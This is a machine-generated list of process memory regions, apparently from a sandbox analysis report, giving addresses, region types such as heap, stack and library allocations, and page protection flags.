heap
page read and write
1F16B245000
heap
page read and write
24130A57000
heap
page read and write
24AB7341000
heap
page read and write
24ECC634000
heap
page read and write
241333D4000
heap
page read and write
7C2D7CF000
stack
page read and write
1984D9C0000
trusted library section
page readonly
24132C3F000
heap
page read and write
7FFE8FF80000
unkown
page readonly
1B7EED00000
heap
page read and write
1DA0082E000
heap
page read and write
C68D3FF000
stack
page read and write
161B1C00000
heap
page read and write
7FFE8FF90000
unkown
page execute and read and write
2413354D000
heap
page read and write
253D8D60000
heap
page read and write
24130990000
heap
page read and write
17134AEA000
heap
page read and write
1DBD7C59000
heap
page read and write
1AEA6E11000
heap
page read and write
1DBD7CDC000
heap
page read and write
270AE629000
heap
page read and write
1DACF03E000
heap
page read and write
1F61A41D000
heap
page read and write
1FABFC57000
heap
page read and write
2360FC86000
heap
page read and write
20492B15000
heap
page read and write
2533EA37000
heap
page read and write
1ED48B0D000
heap
page read and write
60522FE000
stack
page read and write
7FFE905B3000
unkown
page read and write
1F16B8F3000
heap
page read and write
1C46EA30000
heap
page read and write
1ED46C93000
heap
page read and write
1F877FAC000
heap
page read and write
1DBD7C63000
heap
page read and write
1DBD7CE3000
heap
page read and write
1ED48B0E000
heap
page read and write
1DAD015A000
heap
page read and write
253D8DFC000
heap
page read and write
1DBD7E40000
heap
page read and write
1C3C5910000
heap
page read and write
20C95654000
heap
page read and write
1FABF8EA000
heap
page read and write
24130A8A000
heap
page read and write
1F16B28A000
heap
page read and write
88EDB7E000
unkown
page readonly
2360FBA0000
heap
page read and write
20C94ADA000
trusted library allocation
page read and write
24132B70000
heap
page read and write
1616DC78000
heap
page read and write
1DBD7D28000
heap
page read and write
7FFE15F00000
trusted library allocation
page read and write
7FFE15C6B000
trusted library allocation
page read and write
1DBD84E0000
heap
page read and write
253D8DFB000
heap
page read and write
1DACCF38000
heap
page read and write
7FFE99E5C000
unkown
page execute and write copy
2360FCAB000
heap
page read and write
7FFE75E38000
unkown
page execute and read and write
7FFE7617C000
unkown
page execute and read and write
2533EA3C000
heap
page read and write
24133D27000
heap
page read and write
7FFE15C92000
trusted library allocation
page read and write
270AF230000
heap
page read and write
1DACFB70000
heap
page read and write
CB30CFC000
stack
page read and write
241338F4000
direct allocation
page read and write
24130A44000
heap
page read and write
7B4EAA7000
stack
page read and write
1ED48B16000
heap
page read and write
1616DCAA000
heap
page read and write
1ED48B0E000
heap
page read and write
270AEF51000
heap
page read and write
1F16B91D000
heap
page read and write
24132C58000
heap
page read and write
241334B0000
heap
page read and write
24132C4F000
heap
page read and write
24130A5D000
heap
page read and write
7FFE957D1000
unkown
page execute read
1DBD8377000
heap
page read and write
24AB7341000
heap
page read and write
1DBD7D01000
heap
page read and write
1DACEB91000
heap
page read and write
1FABF684000
heap
page read and write
2D8102FB000
trusted library allocation
page read and write
5F10FE000
stack
page read and write
1DBD7CFC000
heap
page read and write
20492B1E000
heap
page read and write
2413349E000
heap
page read and write
1FABF67C000
heap
page read and write
1BFE6CB4000
heap
page read and write
1FABFC61000
heap
page read and write
2089AFB2000
heap
page read and write
1F16B261000
heap
page read and write
1616DF00000
heap
page read and write
24132C48000
heap
page read and write
24130A37000
heap
page read and write
24EACFF0000
heap
page read and write
1E2C97F0000
heap
page read and write
20C94ACA000
trusted library allocation
page read and write
1984D000000
heap
page read and write
1984D9D0000
trusted library section
page readonly
1DA00068000
heap
page read and write
AB1B27F000
stack
page read and write
19852054000
heap
page read and write
1BFE6C20000
heap
page read and write
1B7EED21000
heap
page read and write
2533EA15000
heap
page read and write
1F16B8F2000
heap
page read and write
270AE629000
heap
page read and write
24133D68000
heap
page read and write
24133542000
heap
page read and write
2221A530000
heap
page read and write
1DB1C470000
heap
page read and write
41A9BBF000
stack
page read and write
24133F9D000
heap
page read and write
3A74D5C000
stack
page read and write
24130AA2000
heap
page read and write
1AEA6E41000
heap
page read and write
2049450F000
trusted library allocation
page read and write
2A2CC8F0000
heap
page read and write
20492B60000
heap
page read and write
1ED47231000
heap
page read and write
24130A63000
heap
page read and write
1DA000A9000
heap
page read and write
2413365C000
heap
page read and write
1616DDE4000
heap
page read and write
24132C39000
heap
page read and write
24132C3F000
heap
page read and write
7E8D4FF000
unkown
page read and write
55CA87F000
stack
page read and write
1F16B8F4000
heap
page read and write
220FF010000
heap
page read and write
24133520000
heap
page read and write
2263E5C9000
heap
page read and write
241333CC000
heap
page read and write
8FCCCFB000
stack
page read and write
1F16B228000
heap
page read and write
253DC3D0000
direct allocation
page read and write
1AEA6E09000
heap
page read and write
20C95668000
heap
page read and write
24132C41000
heap
page read and write
7FFE15F30000
trusted library allocation
page read and write
1F16B8F5000
heap
page read and write
1DAD01A6000
heap
page read and write
174CEEEA000
heap
page read and write
19852061000
heap
page read and write
21A1A3C0000
heap
page read and write
29AF1E00000
heap
page read and write
1E2C9AC4000
heap
page read and write
C585FF000
unkown
page read and write
FC513F9000
stack
page read and write
1DBD9E61000
heap
page read and write
235D1560000
heap
page read and write
24133041000
heap
page read and write
174CEC50000
heap
page read and write
24133170000
direct allocation
page read and write
1619782D000
heap
page read and write
20492CA4000
heap
page read and write
7FFE75D32000
unkown
page execute and read and write
24132B90000
heap
page read and write
253D8DEA000
heap
page read and write
241333B0000
heap
page read and write
1616DE04000
heap
page read and write
24133407000
heap
page read and write
1FAC1506000
heap
page read and write
20492AEC000
heap
page read and write
24EAD340000
heap
page read and write
24132C41000
heap
page read and write
2F8EAFF000
stack
page read and write
1E02DCAB000
heap
page read and write
270AE68E000
heap
page read and write
2413344D000
heap
page read and write
1F16B42E000
heap
page read and write
1F16B42D000
heap
page read and write
1FABF900000
heap
page read and write
198520F0000
heap
page read and write
287A39AB000
heap
page read and write
1CFB9488000
heap
page read and write
1DBD7F4E000
heap
page read and write
1DA002A7000
heap
page read and write
1DBD84CF000
heap
page read and write
18D349E0000
heap
page read and write
1DBD837A000
heap
page read and write
174CED72000
heap
page read and write
24133525000
heap
page read and write
23753462000
heap
page read and write
1616DE1F000
heap
page read and write
1ED46BA0000
heap
page read and write
19853000000
heap
page read and write
1DAD0CBF000
heap
page read and write
1FABFC83000
heap
page read and write
1DAD01A6000
heap
page read and write
220FF01B000
heap
page read and write
281B5D00000
heap
page read and write
270AE649000
heap
page read and write
1DBD7C86000
heap
page read and write
7FF7C7250000
unkown
page readonly
220FEF60000
heap
page read and write
1DACF03A000
heap
page read and write
18207C80000
heap
page read and write
AB1B5FC000
stack
page read and write
2D87C0DC000
heap
page read and write
7FFE8F40E000
unkown
page execute and read and write
EA741CD000
stack
page read and write
1984CF80000
trusted library allocation
page read and write
20C95618000
heap
page read and write
16199390000
heap
page read and write
2049452E000
heap
page read and write
1F16B92A000
heap
page read and write
1F878214000
heap
page read and write
1ED46C99000
heap
page read and write
287A39A0000
heap
page read and write
1DA00825000
heap
page read and write
241334DC000
heap
page read and write
20492ABC000
heap
page read and write
7B4EE7E000
stack
page read and write
69F5F7F000
stack
page read and write
235D1660000
heap
page read and write
17134AFB000
heap
page read and write
24133561000
heap
page read and write
24132C07000
heap
page read and write
2413349E000
heap
page read and write
1DBD7F4D000
heap
page read and write
21A1A150000
heap
page read and write
7FFE15E70000
trusted library allocation
page read and write
24133667000
heap
page read and write
5D5D17F000
stack
page read and write
7FFE7651B000
unkown
page execute and read and write
1F877FC7000
heap
page read and write
19852103000
heap
page read and write
1F16B424000
heap
page read and write
1DA002D3000
heap
page read and write
1DA002B0000
heap
page read and write
1DAD013A000
heap
page read and write
241333A0000
heap
page read and write
1ED4721D000
heap
page read and write
7FFE904F9000
unkown
page execute and write copy
24133F85000
heap
page read and write
20492A97000
heap
page read and write
1984C840000
heap
page read and write
2413366B000
heap
page read and write
7FFE94AC0000
unkown
page readonly
24132C00000
heap
page read and write
20492CA6000
heap
page read and write
20C94ADD000
trusted library allocation
page read and write
20C95757000
heap
page read and write
29425F10000
heap
page read and write
1DA002B0000
heap
page read and write
2D87B630000
trusted library allocation
page read and write
24132C4F000
heap
page read and write
9F87DDF000
stack
page read and write
24133EC7000
heap
page read and write
7FFE15C32000
trusted library allocation
page read and write
20492AD9000
heap
page read and write
24133659000
heap
page read and write
1ED48AF0000
heap
page read and write
7FFE15C70000
trusted library allocation
page execute and read and write
ECBC54C000
stack
page read and write
2089AA9F000
heap
page read and write
1985202D000
heap
page read and write
1AEA6E11000
heap
page read and write
270AE715000
heap
page read and write
8FCCDFE000
unkown
page read and write
25340B0E000
heap
page read and write
2533EA28000
heap
page read and write
5E5A4FF000
unkown
page read and write
24133513000
heap
page read and write
1C8A6000000
heap
page read and write
20492AEF000
heap
page read and write
1984C8A1000
heap
page read and write
241333D1000
heap
page read and write
1DAD017A000
heap
page read and write
436F9BF000
stack
page read and write
1F1A8AB0000
heap
page read and write
1BFE6CD8000
heap
page read and write
1B5C2590000
heap
page read and write
1FABF677000
heap
page read and write
20C9561B000
heap
page read and write
161A96F1000
trusted library allocation
page read and write
1F61A410000
heap
page read and write
29ADF840000
heap
page read and write
1616DE19000
heap
page read and write
16199250000
trusted library allocation
page read and write
7FFE8FF96000
unkown
page execute and write copy
1E02DCC1000
heap
page read and write
20C94AD3000
trusted library allocation
page read and write
7FFE15CF0000
trusted library allocation
page read and write
1FABF5F0000
heap
page read and write
1FABF653000
heap
page read and write
24132E7F000
heap
page read and write
1C8A6056000
heap
page read and write
1DBD7C91000
heap
page read and write
1DBD7C83000
heap
page read and write
1DACF03B000
heap
page read and write
23753670000
heap
page read and write
24133659000
heap
page read and write
1AEA6E09000
heap
page read and write
198520C4000
heap
page read and write
FC5147E000
stack
page read and write
2533F27E000
heap
page read and write
270AEF72000
heap
page read and write
7FFE90B79000
unkown
page execute and read and write
DADE9FF000
unkown
page read and write
1FABFC81000
heap
page read and write
270AEF4E000
heap
page read and write
270AF0E0000
heap
page read and write
270AEF81000
heap
page read and write
16197810000
trusted library allocation
page read and write
24132BDC000
heap
page read and write
270AE5F6000
heap
page read and write
1DA002A0000
heap
page read and write
24130A63000
heap
page read and write
1ED46C9E000
heap
page read and write
19851F20000
trusted library allocation
page read and write
1E777BB0000
heap
page read and write
253D9050000
heap
page read and write
1ED48B00000
heap
page read and write
20492B51000
heap
page read and write
1F16B8FE000
heap
page read and write
1DBD7C91000
heap
page read and write
2089B0A2000
heap
page read and write
2636AC60000
heap
page read and write
2125C3B1000
heap
page read and write
19851F10000
trusted library allocation
page read and write
127727F000
stack
page read and write
1DAD013A000
heap
page read and write
C9784FB000
stack
page read and write
2D87BD7F000
heap
page read and write
253D90A0000
heap
page read and write
1DF54E00000
heap
page read and write
2089AC34000
heap
page read and write
1ED47229000
heap
page read and write
270AF0EA000
heap
page read and write
7FFE8F41B000
unkown
page execute and write copy
1DBD7CF6000
heap
page read and write
24133472000
heap
page read and write
1F61A3F5000
heap
page read and write
24133556000
heap
page read and write
EA744FF000
stack
page read and write
1DA00048000
heap
page read and write
1DACF03A000
heap
page read and write
24132BF6000
heap
page read and write
1F16D340000
heap
page read and write
2413354C000
heap
page read and write
7FF7C7288000
unkown
page readonly
24133546000
heap
page read and write
88EDC7E000
unkown
page readonly
1984D9F0000
trusted library section
page readonly
24132C67000
heap
page read and write
253DC480000
direct allocation
page read and write
1E777EA0000
heap
page read and write
235D1730000
heap
page read and write
2089C9A4000
heap
page read and write
21A1A505000
heap
page read and write
2413366F000
heap
page read and write
270AEF85000
heap
page read and write
1E777BDB000
heap
page read and write
1F16D1B4000
heap
page read and write
253DA950000
direct allocation
page read and write
7FF6FFC50000
unkown
page readonly
2089AA7A000
heap
page read and write
20C95757000
heap
page read and write
20C955F4000
heap
page read and write
7FFE15AC0000
trusted library allocation
page read and write
24133513000
heap
page read and write
2089AA57000
heap
page read and write
1DAD0AB4000
heap
page read and write
1ED46C57000
heap
page read and write
C758EFF000
unkown
page read and write
20C94AC5000
trusted library allocation
page read and write
1DACE840000
heap
page read and write
2125C3B1000
heap
page read and write
1F16B8F0000
heap
page read and write
24133F7F000
heap
page read and write
1DBD9E6E000
heap
page read and write
1E777EA4000
heap
page read and write
1DA00075000
heap
page read and write
21A1A208000
heap
page read and write
1F16B253000
heap
page read and write
2D87BD5B000
heap
page read and write
1DACCFAA000
heap
page read and write
24133FD4000
heap
page read and write
2533ECD4000
heap
page read and write
270AEF60000
heap
page read and write
2D800087000
trusted library allocation
page read and write
20492AEE000
heap
page read and write
4DF8CFF000
stack
page read and write
24130A63000
heap
page read and write
18859B9D000
heap
page read and write
1ED46C0A000
heap
page read and write
AB1B2FF000
stack
page read and write
253D8DE0000
heap
page read and write
2089B0AA000
heap
page read and write
7FFE75D97000
unkown
page read and write
7FFE15C98000
trusted library allocation
page read and write
1DAD0142000
heap
page read and write
24133551000
heap
page read and write
270AE643000
heap
page read and write
2413301D000
heap
page read and write
7FFE8FF60000
unkown
page readonly
270AF050000
heap
page read and write
20492B33000
heap
page read and write
1DBD7D12000
heap
page read and write
1616DE1C000
heap
page read and write
69F5FFE000
stack
page read and write
605237F000
stack
page read and write
2533EA22000
heap
page read and write
7FFE99E5B000
unkown
page execute and read and write
24133549000
heap
page read and write
270AE643000
heap
page read and write
18D3475B000
heap
page read and write
253D9030000
direct allocation
page read and write
283A1FF000
stack
page read and write
1DF54D21000
heap
page read and write
7FFE15D30000
trusted library allocation
page read and write
24133FD4000
heap
page read and write
7FFE15F20000
trusted library allocation
page read and write
2263E870000
heap
page read and write
24133FAC000
heap
page read and write
2413328D000
heap
page read and write
24130A63000
heap
page read and write
2221A56B000
heap
page read and write
1DBD7D2C000
heap
page read and write
1ED46C32000
heap
page read and write
18859BAC000
heap
page read and write
17134AEC000
heap
page read and write
2D87BFB7000
heap
page read and write
24132C43000
heap
page read and write
24133539000
heap
page read and write
88EDBFE000
stack
page read and write
1616DC40000
heap
page read and write
270AE613000
heap
page read and write
4DF8AFC000
stack
page read and write
1B7EF084000
heap
page read and write
24133516000
heap
page read and write
1DACEF44000
heap
page read and write
1616DC95000
heap
page read and write
24132C56000
heap
page read and write
7FFE75E51000
unkown
page read and write
7EA9AFF000
unkown
page read and write
24132FB9000
heap
page read and write
270AE5CD000
heap
page read and write
16197836000
heap
page read and write
1F16B170000
heap
page read and write
2125C3BE000
heap
page read and write
24133549000
heap
page read and write
20492CA0000
heap
page read and write
1DBD7E80000
trusted library allocation
page read and write
2413352D000
heap
page read and write
1616FC6E000
heap
page read and write
24133920000
direct allocation
page read and write
270AE6A6000
heap
page read and write
20492AEC000
heap
page read and write
1FABF8E5000
heap
page read and write
2413365E000
heap
page read and write
24133669000
heap
page read and write
2533F110000
heap
page read and write
1FAC14FE000
heap
page read and write
20492B5E000
heap
page read and write
1ED46C73000
heap
page read and write
7FF6FFC51000
unkown
page execute read
241334B0000
heap
page read and write
174CED57000
heap
page read and write
D5771FF000
unkown
page read and write
7FFE15D70000
trusted library allocation
page read and write
270AEF53000
heap
page read and write
1DBD7CA5000
heap
page read and write
24132B80000
heap
page read and write
2125C3B2000
heap
page read and write
24133940000
direct allocation
page read and write
241334F4000
heap
page read and write
1DA00074000
heap
page read and write
1616DE04000
heap
page read and write
270AF0EE000
heap
page read and write
24132C70000
direct allocation
page read and write
7FFE15C30000
trusted library allocation
page read and write
1616DF04000
heap
page read and write
2413352D000
heap
page read and write
25340B0E000
heap
page read and write
24133F9C000
heap
page read and write
2413347F000
heap
page read and write
1277078000
stack
page read and write
2089AA9B000
heap
page read and write
7FFE76635000
unkown
page execute and read and write
24133562000
heap
page read and write
1616DDEE000
heap
page read and write
88EE77E000
unkown
page readonly
1ED46C90000
heap
page read and write
5E5A5FE000
stack
page read and write
29AF1BA0000
heap
page read and write
2533EA42000
heap
page read and write
7FFE784F1000
unkown
page execute and read and write
24133495000
heap
page read and write
22E8B994000
heap
page read and write
1DB1C5A1000
heap
page read and write
24132B9D000
heap
page read and write
1F16B279000
heap
page read and write
7FFE15B0C000
trusted library allocation
page execute and read and write
281B5DB0000
heap
page read and write
241334EE000
heap
page read and write
2413352D000
heap
page read and write
20492B13000
heap
page read and write
1F877FB6000
heap
page read and write
54751FF000
unkown
page read and write
1619AFCA000
trusted library allocation
page read and write
7FFE90B61000
unkown
page execute and read and write
20C9567C000
heap
page read and write
2533F267000
heap
page read and write
2D80194E000
trusted library allocation
page read and write
24132C44000
heap
page read and write
29196FA0000
heap
page read and write
18FDFCB0000
heap
page read and write
109D27F000
stack
page read and write
198520FD000
heap
page read and write
2221A830000
heap
page read and write
1DACFC5F000
heap
page read and write
2413338C000
heap
page read and write
24132FF9000
heap
page read and write
24132E70000
heap
page read and write
20C94AC8000
trusted library allocation
page read and write
109E34E000
stack
page read and write
27148B34000
heap
page read and write
24133041000
heap
page read and write
7FFE15E48000
trusted library allocation
page read and write
253DA994000
heap
page read and write
23639950000
heap
page read and write
7FFE15DE0000
trusted library allocation
page read and write
1FABF8E3000
heap
page read and write
20C95613000
heap
page read and write
7FFE78658000
unkown
page execute and write copy
1DACCEEB000
heap
page read and write
1ED0FC50000
heap
page read and write
1F16B912000
heap
page read and write
253D8E8E000
heap
page read and write
436EFF6000
stack
page read and write
241333B5000
heap
page read and write
24134426000
heap
page read and write
24132BE5000
heap
page read and write
24132BA9000
heap
page read and write
22E8B788000
heap
page read and write
253DC350000
direct allocation
page read and write
2360FC8B000
heap
page read and write
20C95757000
heap
page read and write
1FABF5C0000
trusted library allocation
page read and write
24130A31000
heap
page read and write
241333A0000
heap
page read and write
1F16B22B000
heap
page read and write
2D87BD87000
heap
page read and write
2089AAB6000
heap
page read and write
24133551000
heap
page read and write
174CEB70000
heap
page read and write
1F16B28A000
heap
page read and write
2413351B000
heap
page read and write
2C160BC4000
heap
page read and write
62E197F000
stack
page read and write
109D579000
stack
page read and write
1E02DFF5000
heap
page read and write
24133487000
heap
page read and write
2636AE80000
heap
page read and write
1B7EEED0000
heap
page read and write
20492B5E000
heap
page read and write
2089C991000
heap
page read and write
1869CB60000
heap
page read and write
20C95618000
heap
page read and write
12772FF000
stack
page read and write
1869CB6B000
heap
page read and write
1F61A290000
heap
page read and write
1ED46C60000
heap
page read and write
2B4B8860000
heap
page read and write
2413346A000
heap
page read and write
270AE65A000
heap
page read and write
1AEA6E34000
heap
page read and write
253D8E3D000
heap
page read and write
1ED46C60000
heap
page read and write
20C9561B000
heap
page read and write
1DAD0131000
heap
page read and write
7FFE15C80000
trusted library allocation
page execute and read and write
1FABF904000
heap
page read and write
2413363F000
heap
page read and write
270AEF51000
heap
page read and write
270AEF66000
heap
page read and write
1FB144B0000
heap
page read and write
22E8B790000
heap
page read and write
24130A42000
heap
page read and write
20492B64000
heap
page read and write
253D8E83000
heap
page read and write
1616DE03000
heap
page read and write
241333A0000
heap
page read and write
20C95602000
heap
page read and write
1616FC60000
heap
page read and write
2533EA3C000
heap
page read and write
19851F00000
trusted library allocation
page read and write
19851DB0000
trusted library allocation
page read and write
2125C3B1000
heap
page read and write
253DC482000
direct allocation
page read and write
7DF47ED80000
trusted library allocation
page execute and read and write
220FEF50000
heap
page read and write
24133480000
heap
page read and write
1FABF646000
heap
page read and write
2533EA0A000
heap
page read and write
2A2CC671000
heap
page read and write
24133F93000
heap
page read and write
24133525000
heap
page read and write
24133521000
heap
page read and write
A2B4BC4000
stack
page read and write
1F16B929000
heap
page read and write
7FFE8FF92000
unkown
page execute and read and write
23639BF0000
heap
page read and write
24130A60000
heap
page read and write
29196FAB000
heap
page read and write
19851E00000
trusted library allocation
page read and write
7FFE15B40000
trusted library allocation
page read and write
20C95602000
heap
page read and write
24130A97000
heap
page read and write
1ED46C73000
heap
page read and write
3A0E64E000
stack
page read and write
1CFB947B000
heap
page read and write
2D800EC7000
trusted library allocation
page read and write
1616DE27000
heap
page read and write
1F16B8FA000
heap
page read and write
161A99D6000
trusted library allocation
page read and write
24133041000
heap
page read and write
24133F9D000
heap
page read and write
17134AF0000
heap
page read and write
2125C3B1000
heap
page read and write
24EACFF0000
heap
page read and write
2360FCAF000
heap
page read and write
493B0FF000
stack
page read and write
1F16B208000
heap
page read and write
1ED46C67000
heap
page read and write
1984C7F0000
heap
page read and write
2089AFBA000
heap
page read and write
1ED0FCF0000
heap
page read and write
24133546000
heap
page read and write
24133514000
heap
page read and write
270AE643000
heap
page read and write
241333D4000
heap
page read and write
2A2CC671000
heap
page read and write
A9297FF000
unkown
page read and write
76DE7BB000
stack
page read and write
281B5D20000
heap
page read and write
241327B8000
direct allocation
page read and write
1F1A8AD1000
heap
page read and write
1FABFC78000
heap
page read and write
1ED4721D000
heap
page read and write
2533EA39000
heap
page read and write
7FFE94441000
unkown
page execute and read and write
2D879FF4000
heap
page read and write
2089A900000
heap
page read and write
29ADF74A000
heap
page read and write
24133556000
heap
page read and write
24132C31000
heap
page read and write
1F16B933000
heap
page read and write
7FFE90590000
unkown
page readonly
253D8D70000
heap
page read and write
2413345A000
heap
page read and write
24133473000
heap
page read and write
88EECFE000
stack
page read and write
436F7CF000
stack
page read and write
1FABF652000
heap
page read and write
270AF333000
heap
page read and write
24AB7420000
heap
page read and write
1DA00250000
trusted library allocation
page read and write
270AE649000
heap
page read and write
7FF6FFC94000
unkown
page readonly
1F1A8D70000
heap
page read and write
7FFE15A92000
trusted library allocation
page read and write
1F16B208000
heap
page read and write
20492AD8000
heap
page read and write
1616DCB2000
heap
page read and write
1DAD0142000
heap
page read and write
1DB1C5A1000
heap
page read and write
270AEF5C000
heap
page read and write
1FDEF1C1000
heap
page read and write
270AEF5C000
heap
page read and write
7FFE15E50000
trusted library allocation
page read and write
18859B9F000
heap
page read and write
5F137E000
stack
page read and write
1DBD7CF8000
heap
page read and write
20C95614000
heap
page read and write
270AF23F000
heap
page read and write
2533E9C0000
trusted library allocation
page read and write
20C95618000
heap
page read and write
220FEFA4000
heap
page read and write
241334A8000
heap
page read and write
7FFE15B4C000
trusted library allocation
page execute and read and write
1DACF03E000
heap
page read and write
20492CAD000
heap
page read and write
2B4B8931000
heap
page read and write
2413340D000
heap
page read and write
19851F20000
trusted library allocation
page read and write
24133565000
heap
page read and write
88EDE7E000
unkown
page readonly
1616DDE2000
heap
page read and write
1C46EB10000
heap
page read and write
2125C3B1000
heap
page read and write
1ED46C60000
heap
page read and write
C9786FE000
stack
page read and write
1C46EBF4000
heap
page read and write
270AEF6D000
heap
page read and write
24EACFD0000
heap
page read and write
1FAC14F2000
heap
page read and write
3B9ABFF000
unkown
page read and write
241334A6000
heap
page read and write
20492A78000
heap
page read and write
24132EC4000
heap
page read and write
1DBD84F3000
heap
page read and write
7FFE75E60000
unkown
page readonly
1616FC64000
heap
page read and write
24132B79000
heap
page read and write
2636AE50000
heap
page read and write
241334E9000
heap
page read and write
1AEA6E34000
heap
page read and write
1DBD7D37000
heap
page read and write
2413366F000
heap
page read and write
7FFE75E15000
unkown
page execute and read and write
1F16B287000
heap
page read and write
20C9560A000
heap
page read and write
161B1837000
heap
page read and write
1C8A604B000
heap
page read and write
1DBD7CA7000
heap
page read and write
24132C3F000
heap
page read and write
24133546000
heap
page read and write
21A1A211000
heap
page read and write
7FFE94458000
unkown
page read and write
20C95748000
heap
page read and write
2533E9B0000
heap
page read and write
226F4FB4000
heap
page read and write
1DA00083000
heap
page read and write
7FFE75D8B000
unkown
page execute and read and write
24132C05000
heap
page read and write
241334EF000
heap
page read and write
1F16B91D000
heap
page read and write
29426000000
heap
page read and write
7FF6FFC7B000
unkown
page readonly
2263E874000
heap
page read and write
20492AC0000
heap
page read and write
F933EFF000
stack
page read and write
253D8E00000
heap
page read and write
20C95618000
heap
page read and write
29426030000
heap
page read and write
24132BDD000
heap
page read and write
2D801867000
trusted library allocation
page read and write
23FDF091000
heap
page read and write
23FDF2F5000
heap
page read and write
24133478000
heap
page read and write
24133974000
direct allocation
page read and write
1DB1C5A1000
heap
page read and write
24133D68000
heap
page read and write
20492AD2000
heap
page read and write
24133657000
heap
page read and write
2413355E000
heap
page read and write
1F1A8BB0000
heap
page read and write
1DBD7E60000
heap
page read and write
7FFE75EEA000
unkown
page execute and read and write
24132BDC000
heap
page read and write
5D5CDBF000
stack
page read and write
24133280000
heap
page read and write
241334FC000
heap
page read and write
270AF23E000
heap
page read and write
270AF0EE000
heap
page read and write
1DACCF63000
heap
page read and write
18859B75000
heap
page read and write
161B17F6000
heap
page read and write
1F877EF0000
heap
page read and write
7FFE8FF72000
unkown
page execute and write copy
1FAC14F6000
heap
page read and write
7FFE15C59000
trusted library allocation
page read and write
22E8B77B000
heap
page read and write
16197820000
heap
page read and write
24133500000
heap
page read and write
20C94AD2000
trusted library allocation
page read and write
1DBD7CA5000
heap
page read and write
2533EA10000
heap
page read and write
7FFE957D0000
unkown
page readonly
2360FBF4000
heap
page read and write
1DACF180000
heap
page read and write
1DB1C598000
heap
page read and write
24132EC0000
heap
page read and write
174CED70000
heap
page read and write
2413366F000
heap
page read and write
19851EB0000
trusted library allocation
page read and write
87B30FF000
stack
page read and write
23FDF091000
heap
page read and write
270AE5BB000
heap
page read and write
1E777BF1000
heap
page read and write
18207ABB000
heap
page read and write
253D8E0A000
heap
page read and write
1DA00030000
heap
page read and write
2089AAB1000
heap
page read and write
24133561000
heap
page read and write
18859B00000
heap
page read and write
24133525000
heap
page read and write
24132BE5000
heap
page read and write
24438250000
heap
page read and write
24133FB3000
heap
page read and write
24133657000
heap
page read and write
20492AF5000
heap
page read and write
1DF55025000
heap
page read and write
1CAA7F20000
heap
page read and write
2D810013000
trusted library allocation
page read and write
1F16B28A000
heap
page read and write
7FFE15DD0000
trusted library allocation
page read and write
1DBD84EF000
heap
page read and write
24EACF40000
heap
page read and write
1F16B929000
heap
page read and write
270AE5CA000
heap
page read and write
1BFE6CE1000
heap
page read and write
1FABF8E7000
heap
page read and write
6808FFF000
unkown
page read and write
24133565000
heap
page read and write
20C94AC7000
trusted library allocation
page read and write
7FFE76109000
unkown
page execute and read and write
7FFE75E4D000
unkown
page execute and read and write
284F3424000
heap
page read and write
198520F7000
heap
page read and write
174CED7F000
heap
page read and write
17134A70000
heap
page read and write
1DBD9E60000
heap
page read and write
24133561000
heap
page read and write
24132C4B000
heap
page read and write
24133659000
heap
page read and write
2413348F000
heap
page read and write
1FABFC78000
heap
page read and write
9F87D5F000
stack
page read and write
1616DCB8000
heap
page read and write
24133EB3000
heap
page read and write
24133521000
heap
page read and write
24133641000
heap
page read and write
16197A10000
heap
page readonly
1F16B239000
heap
page read and write
1C3C5BB0000
heap
page read and write
1DA00827000
heap
page read and write
17134AEE000
heap
page read and write
1DF54D18000
heap
page read and write
20494450000
heap
page read and write
2C160BC4000
heap
page read and write
270AEF5A000
heap
page read and write
24132F64000
heap
page read and write
BEDB78C000
stack
page read and write
1DA00063000
heap
page read and write
7FFE15DF0000
trusted library allocation
page read and write
24130A56000
heap
page read and write
161B1842000
heap
page read and write
1F1A8AE1000
heap
page read and write
24132830000
direct allocation
page read and write
1DF54D21000
heap
page read and write
161B1C70000
heap
page read and write
174CED7C000
heap
page read and write
270AEF5C000
heap
page read and write
1616DB60000
heap
page read and write
436EFFD000
stack
page read and write
2D87C0DE000
heap
page read and write
1DA02110000
heap
page read and write
1DAD0152000
heap
page read and write
253DC3B0000
direct allocation
page read and write
241333CC000
heap
page read and write
25340B00000
heap
page read and write
270AE649000
heap
page read and write
1DA00064000
heap
page read and write
1F16B90E000
heap
page read and write
2360FC85000
heap
page read and write
69F607F000
stack
page read and write
20492B60000
heap
page read and write
24133F7F000
heap
page read and write
1DBD8377000
heap
page read and write
16199282000
trusted library allocation
page read and write
24133546000
heap
page read and write
7FFE94ACA000
unkown
page execute and write copy
23FDF2F0000
heap
page read and write
1F16B8F7000
heap
page read and write
24132C48000
heap
page read and write
1F16B25C000
heap
page read and write
1ED47214000
heap
page read and write
1F877FB6000
heap
page read and write
18207E20000
heap
page read and write
7FFE76600000
unkown
page execute and read and write
1B5C2834000
heap
page read and write
2D800001000
trusted library allocation
page read and write
2C160BC4000
heap
page read and write
1F61A40D000
heap
page read and write
2089B0A3000
heap
page read and write
1F16B90F000
heap
page read and write
2D879CBD000
heap
page read and write
1F61A64A000
heap
page read and write
7FFE15B46000
trusted library allocation
page read and write
1F878090000
heap
page read and write
1616DCAE000
heap
page read and write
24132F83000
heap
page read and write
270AE62C000
heap
page read and write
24133667000
heap
page read and write
2533E9D8000
heap
page read and write
2125C3B1000
heap
page read and write
1616DDE3000
heap
page read and write
1F877FB1000
heap
page read and write
910B3FF000
stack
page read and write
24133521000
heap
page read and write
7FFE99DB1000
unkown
page execute and read and write
1DA0009A000
heap
page read and write
1DACCF36000
heap
page read and write
7FFE15D80000
trusted library allocation
page read and write
FC51778000
stack
page read and write
24132C31000
heap
page read and write
2D87BFCB000
heap
page read and write
2413347F000
heap
page read and write
1C8A6060000
heap
page read and write
1DBD8372000
heap
page read and write
7FFE760D8000
unkown
page execute and read and write
2413344D000
heap
page read and write
24132EC6000
heap
page read and write
1DACCFC0000
heap
page read and write
1616DC88000
heap
page read and write
1ED46B30000
heap
page read and write
241334ED000
heap
page read and write
24133486000
heap
page read and write
270AE643000
heap
page read and write
1C8A6058000
heap
page read and write
1DA002BE000
heap
page read and write
24133558000
heap
page read and write
1FDEF1AB000
heap
page read and write
24132F93000
heap
page read and write
7FFE15E10000
trusted library allocation
page read and write
174CED6E000
heap
page read and write
253D8E0A000
heap
page read and write
1DA00250000
trusted library allocation
page read and write
24438270000
heap
page read and write
241333B0000
heap
page read and write
2089C996000
heap
page read and write
24130A31000
heap
page read and write
253D8E07000
heap
page read and write
1FABF67D000
heap
page read and write
2413352F000
heap
page read and write
1DAD0153000
heap
page read and write
2221A581000
heap
page read and write
24133473000
heap
page read and write
24133041000
heap
page read and write
1ED48B14000
heap
page read and write
270AEF53000
heap
page read and write
2089AA84000
heap
page read and write
1ED47228000
heap
page read and write
